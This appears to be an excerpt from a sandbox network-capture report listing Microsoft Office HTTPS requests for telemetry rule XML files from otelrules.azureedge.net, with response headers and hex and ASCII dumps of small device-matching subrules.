                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                                      x-ms-request-id: feb02638-401e-0067-7b8c-3a09c2000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095420Z-r1d97b99577tssmjhC1TEB8kan00000008p0000000002uyr
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      41192.168.2.64975213.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:20 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 479
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                                                      x-ms-request-id: a1d815ed-301e-0096-3f8c-3ae71d000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095420Z-r1d97b99577d6qrbhC1TEBux5s00000008q000000000hdk5
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      42192.168.2.64975113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:20 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 400
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                                                      x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095420Z-r1d97b995774zjnrhC1TEBv1ww00000008kg00000000ayax
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      43192.168.2.64975313.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:20 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 425
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 62f36519-501e-0016-468c-3a181b000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095420Z-185f5d8b95ctl8xlhC1NYCn94g0000000a1000000000g1r7
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      44192.168.2.64975413.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:20 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 475
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 7511d71d-801e-0083-6e8c-3af0ae000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095420Z-185f5d8b95crwqd8hC1NYCps680000000a10000000008vzd
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      45192.168.2.64975513.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:20 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 448
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                                                      x-ms-request-id: c1a1e3cb-901e-005b-1f8c-3a2005000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095420Z-1777c6cb754xlpjshC1TEBv8cc00000009kg000000007urr
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      46192.168.2.64975613.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 491
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                                                      x-ms-request-id: e456cfdf-c01e-0014-248c-3aa6a3000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095421Z-r1d97b99577hsvhhhC1TEByb1w00000002vg00000000f89q
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      47192.168.2.64975713.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:20 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 416
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 5b8b83f7-201e-0033-0b8c-3ab167000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095421Z-185f5d8b95crwqd8hC1NYCps680000000a300000000053s5
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      48192.168.2.64975813.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 479
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                                                      x-ms-request-id: a1cdeef9-f01e-0020-348c-3a956b000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095421Z-185f5d8b95c5lcmhhC1NYCsnsw0000000a40000000008rpq
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      49192.168.2.64975913.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
